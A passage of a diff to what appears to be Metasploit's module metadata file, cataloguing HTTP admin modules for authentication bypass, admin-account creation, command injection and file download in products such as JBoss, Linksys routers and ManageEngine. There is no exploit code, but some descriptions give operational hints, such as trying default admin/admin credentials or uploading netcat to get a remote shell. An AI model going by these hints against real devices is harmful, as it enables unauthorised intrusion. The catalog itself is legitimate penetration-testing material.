"/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb", + "is_install_path": true, + "ref_name": "admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/hp_web_jetadmin_exec": { + "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution", + "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-04-27", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.", + "references": [ + "OSVDB-5798", + "BID-10224", + "EDB-294" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/hp_web_jetadmin_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/ibm_drm_download": { + "name": "IBM Data Risk Manager Arbitrary File Download", + "fullname": "auxiliary/admin/http/ibm_drm_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-21", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n an unauthenticated attacker to download arbitrary files off the system.\n The first is an unauthenticated bypass, followed by a path traversal.\n This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n A downloaded file is zipped, and this module also unzips it before storing it in the database.\n By default this module downloads Tomcat's application.properties files, which contains the\n database password, amongst other sensitive data.\n At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.\n Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.", + "references": [ + "CVE-2020-4427", + "CVE-2020-4429", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md", + "URL-https://seclists.org/fulldisclosure/2020/Apr/33", + "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb", + "is_install_path": true, + "ref_name": "admin/http/ibm_drm_download", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/http/idsecure_auth_bypass": { + "name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)", + "fullname": "auxiliary/admin/http/idsecure_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-11-27", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Tenable" + ], + "description": "This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. It allows an\n unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.", + "references": [ + "CVE-2023-6329", + "URL-https://www.tenable.com/security/research/tra-2023-36" + ], + "platform": "", + "arch": "", + "rport": 30443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-19 21:17:16 +0000", + "path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/idsecure_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/iis_auth_bypass": { + "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", + "fullname": "auxiliary/admin/http/iis_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-02", + "type": "auxiliary", + "author": [ + "Soroush Dalili", + "sinn3r " + ], + "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.", + "references": [ + "CVE-2010-2731", + "OSVDB-66160", + "MSB-MS10-065", + "URL-https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/iis_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/iis_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/intersil_pass_reset": { + "name": "Intersil (Boa) HTTPd Basic Authentication Password Reset", + "fullname": "auxiliary/admin/http/intersil_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-09-10", + "type": "auxiliary", + "author": [ + "Luca \"ikki\" Carettoni ", + "Claudio \"paper\" Merloni ", + "Max Dietz " + ], + "description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.", + "references": [ + "CVE-2007-4915", + "BID-25676", + "PACKETSTORM-59347" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/intersil_pass_reset", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/iomega_storcenterpro_sessionid": { + "name": "Iomega StorCenter Pro NAS Web Authentication Bypass", + "fullname": "auxiliary/admin/http/iomega_storcenterpro_sessionid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,\n allowing for simple brute force attacks to bypass authentication and gain administrative\n access.", + "references": [ + "OSVDB-55586", + "CVE-2009-2367" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", + "is_install_path": true, + "ref_name": "admin/http/iomega_storcenterpro_sessionid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/ivanti_vtm_admin": { + "name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)", + "fullname": "auxiliary/admin/http/ivanti_vtm_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-08-05", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "ohnoisploited", + "mxalias" + ], + "description": "This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new\n administrative user to the web interface of the application.\n\n Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.", + "references": [ + "PACKETSTORM-179906", + "CVE-2024-7593", + "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-16 15:43:34 +0000", + "path": "/modules/auxiliary/admin/http/ivanti_vtm_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/ivanti_vtm_admin", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/jboss_bshdeployer": { + "name": "JBoss JMX Console Beanshell Deployer WAR Upload and Deployment", + "fullname": "auxiliary/admin/http/jboss_bshdeployer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "us3r777 " + ], + "description": "This module can be used to install a WAR file payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:BSHDeployer's createScriptDeployment() method.", + "references": [ + "CVE-2010-0738", + "OSVDB-64171", + "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/jboss_bshdeployer.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_bshdeployer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Deploy", + "description": "Create and deploy app (WAR) to deliver payload" + }, + { + "name": "Undeploy", + "description": "Remove app (WAR) for cleanup" + } + ] + }, + "auxiliary_admin/http/jboss_deploymentfilerepository": { + "name": "JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment", + "fullname": "auxiliary/admin/http/jboss_deploymentfilerepository", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "us3r777 " + ], + "description": "This module uses the DeploymentFileRepository class in the JBoss Application Server\n to deploy a JSP file which then deploys an arbitrary WAR file.", + "references": [ + "CVE-2010-0738", + "OSVDB-64171", + "URL-https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=574105" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_deploymentfilerepository", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Deploy", + "description": "Create and deploy app (WAR) to deliver payload" + }, + { + "name": "Undeploy", + "description": "Remove app (WAR) for cleanup" + } + ] + }, + "auxiliary_admin/http/jboss_seam_exec": { + "name": "JBoss Seam 2 Remote Command Execution", + "fullname": "auxiliary/admin/http/jboss_seam_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-19", + "type": "auxiliary", + "author": [ + "guerrino di massa", + "Cristiano Maruti " + ], + "description": "JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform\n 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression\n Language (EL) expressions, which allows remote attackers to execute arbitrary code\n via a crafted URL. This modules also has been tested successfully against IBM\n WebSphere 6.1 running on iSeries.\n\n NOTE: this is only a vulnerability when the Java Security Manager is not properly\n configured.", + "references": [ + "CVE-2010-1871", + "OSVDB-66881" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/jboss_seam_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/jboss_seam_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/joomla_registration_privesc": { + "name": "Joomla Account Creation and Privilege Escalation", + "fullname": "auxiliary/admin/http/joomla_registration_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-10-25", + "type": "auxiliary", + "author": [ + "Fabio Pires ", + "Filipe Reis ", + "Vitor Oliveira " + ], + "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).", + "references": [ + "CVE-2016-8869", + "CVE-2016-8870", + "URL-https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html", + "URL-https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html", + "URL-https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/joomla_registration_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/joomla_registration_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/kaseya_master_admin": { + "name": "Kaseya VSA Master Administrator Account Creation", + "fullname": "auxiliary/admin/http/kaseya_master_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-09-23", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new\n Master Administrator account. Normally this page is only accessible via the localhost\n interface, but the application does nothing to prevent this apart from attempting to\n force a redirect. This module has been tested with Kaseya VSA v7.0.0.17, v8.0.0.10 and\n v9.0.0.3.", + "references": [ + "CVE-2015-6922", + "ZDI-15-448", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", + "URL-https://seclists.org/bugtraq/2015/Sep/132" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/kaseya_master_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/kaseya_master_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/katello_satellite_priv_esc": { + "name": "Katello (Red Hat Satellite) users/update_roles Missing Authorization", + "fullname": "auxiliary/admin/http/katello_satellite_priv_esc", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-24", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": "This module exploits a missing authorization vulnerability in the\n \"update_roles\" action of \"users\" controller of Katello and Red Hat Satellite\n (Katello 1.5.0-14 and earlier) by changing the specified account to an\n administrator account.", + "references": [ + "CVE-2013-2143", + "CWE-862", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=970849" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb", + "is_install_path": true, + "ref_name": "admin/http/katello_satellite_priv_esc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/limesurvey_file_download": { + "name": "Limesurvey Unauthenticated File Download", + "fullname": "auxiliary/admin/http/limesurvey_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-10-12", + "type": "auxiliary", + "author": [ + "Pichaya Morimoto", + "Christian Mehlmauer " + ], + "description": "This module exploits an unauthenticated file download vulnerability\n in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded\n as a ZIP and unzipped automatically, thus binary files can be downloaded.", + "references": [ + "URL-https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-lime-survey/", + "URL-https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015", + "URL-https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/limesurvey_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/limesurvey_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_e1500_e2500_exec": { + "name": "Linksys E1500/E2500 Remote Command Execution", + "fullname": "auxiliary/admin/http/linksys_e1500_e2500_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "Some Linksys Routers are vulnerable to an authenticated OS command injection.\n Default credentials for the web interface are admin/admin or admin/password. Since\n it is a blind os command injection vulnerability, there is no output for the\n executed command. A ping command against a controlled system for can be used for\n testing purposes.", + "references": [ + "OSVDB-89912", + "BID-57760", + "EDB-24475", + "URL-http://www.s3cur1ty.de/m1adv2013-004" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_e1500_e2500_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_tmunblock_admin_reset_bof": { + "name": "Linksys WRT120N tmUnblock Stack Buffer Overflow", + "fullname": "auxiliary/admin/http/linksys_tmunblock_admin_reset_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-19", + "type": "auxiliary", + "author": [ + "Craig Heffner", + "Michael Messner " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in the WRT120N Linksys router\n to reset the password of the management interface temporarily to an empty value.\n This module has been tested successfully on a WRT120N device with firmware version\n 1.0.07.", + "references": [ + "EDB-31758", + "OSVDB-103521", + "URL-https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_tmunblock_admin_reset_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/linksys_wrt54gl_exec": { + "name": "Linksys WRT54GL Remote Command Execution", + "fullname": "auxiliary/admin/http/linksys_wrt54gl_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-18", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "Some Linksys Routers are vulnerable to OS Command injection.\n You will need credentials to the web interface to access the vulnerable part\n of the application.\n Default credentials are always a good starting point. admin/admin or admin\n and blank password could be a first try.\n Note: This is a blind OS command injection vulnerability. This means that\n you will not see any output of your command. Try a ping command to your\n local system and observe the packets with tcpdump (or equivalent) for a first test.\n\n Hint: To get a remote shell you could upload a netcat binary and exec it.\n WARNING: this module will overwrite network and DHCP configuration.", + "references": [ + "URL-http://www.s3cur1ty.de/m1adv2013-01", + "URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl", + "EDB-24202", + "BID-57459", + "OSVDB-89421" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/linksys_wrt54gl_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manage_engine_dc_create_admin": { + "name": "ManageEngine Desktop Central Administrator Account Creation", + "fullname": "auxiliary/admin/http/manage_engine_dc_create_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-31", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an administrator account creation vulnerability in Desktop Central\n from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in\n several versions of Desktop Central (including MSP) from v7 onwards.", + "references": [ + "CVE-2014-7862", + "OSVDB-116554", + "URL-https://seclists.org/fulldisclosure/2015/Jan/2", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt" + ], + "platform": "", + "arch": "", + "rport": 8020, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-08 10:51:35 +0000", + "path": "/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/manage_engine_dc_create_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_dir_listing": { + "name": "ManageEngine Multiple Products Arbitrary Directory Listing", + "fullname": "auxiliary/admin/http/manageengine_dir_listing", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-28", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a directory listing information disclosure vulnerability in the\n FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It\n makes a recursive listing, so it will list the whole drive if you ask it to list / in\n Linux or C:\\ in Windows. This vulnerability is unauthenticated on OpManager and\n Applications Manager, but authenticated in IT360. This module will attempt to login\n using the default credentials for the administrator and guest accounts; alternatively\n you can provide a pre-authenticated cookie or a username / password combo. For IT360\n targets enter the RPORT of the OpManager instance (usually 8300). This module has been\n tested on both Windows and Linux with several different versions. Windows paths have to\n be escaped with 4 backslashes on the command line. There is a companion module that\n allows for arbitrary file download. This vulnerability has been fixed in Applications\n Manager v11.9 b11912 and OpManager 11.6.", + "references": [ + "CVE-2014-7863", + "OSVDB-117696", + "URL-https://seclists.org/fulldisclosure/2015/Jan/114", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_dir_listing.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_dir_listing", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_file_download": { + "name": "ManageEngine Multiple Products Arbitrary File Download", + "fullname": "auxiliary/admin/http/manageengine_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-28", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet\n on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is\n unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This\n module will attempt to login using the default credentials for the administrator and\n guest accounts; alternatively you can provide a pre-authenticated cookie or a username\n and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually\n 8300). This module has been tested on both Windows and Linux with several different\n versions. Windows paths have to be escaped with 4 backslashes on the command line. There is\n a companion module that allows the recursive listing of any directory. This\n vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.", + "references": [ + "CVE-2014-7863", + "OSVDB-117695", + "URL-https://seclists.org/fulldisclosure/2015/Jan/114", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_file_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/manageengine_pmp_privesc": { + "name": "ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection", + "fullname": "auxiliary/admin/http/manageengine_pmp_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-08", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection\n vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate\n privileges and obtain Super Administrator access. A Super Administrator can then\n use his privileges to dump the whole password database in CSV format. PMP can use\n both MySQL and PostgreSQL databases but this module only exploits the latter as\n MySQL does not support stacked queries with Java. PostgreSQL is the default database\n in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL,\n so a higher version does not guarantee exploitability. This module has been tested\n on v6.8 to v7.1 build 7104 on both Windows and Linux. The vulnerability is fixed in\n v7.1 build 7105 and above.", + "references": [ + "CVE-2014-8499", + "OSVDB-114485", + "URL-https://seclists.org/fulldisclosure/2014/Nov/18", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt" + ], + "platform": "", + "arch": "", + "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/manageengine_pmp_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/mantisbt_password_reset": { + "name": "MantisBT password reset", + "fullname": "auxiliary/admin/http/mantisbt_password_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-04-16", + "type": "auxiliary", + "author": [ + "John (hyp3rlinx) Page", + "Julien (jvoisin) Voisin" + ], + "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.", + "references": [ + "CVE-2017-7615", + "EDB-41890", + "URL-https://mantisbt.org/bugs/view.php?id=22690", + "URL-http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt" + ], + "platform": 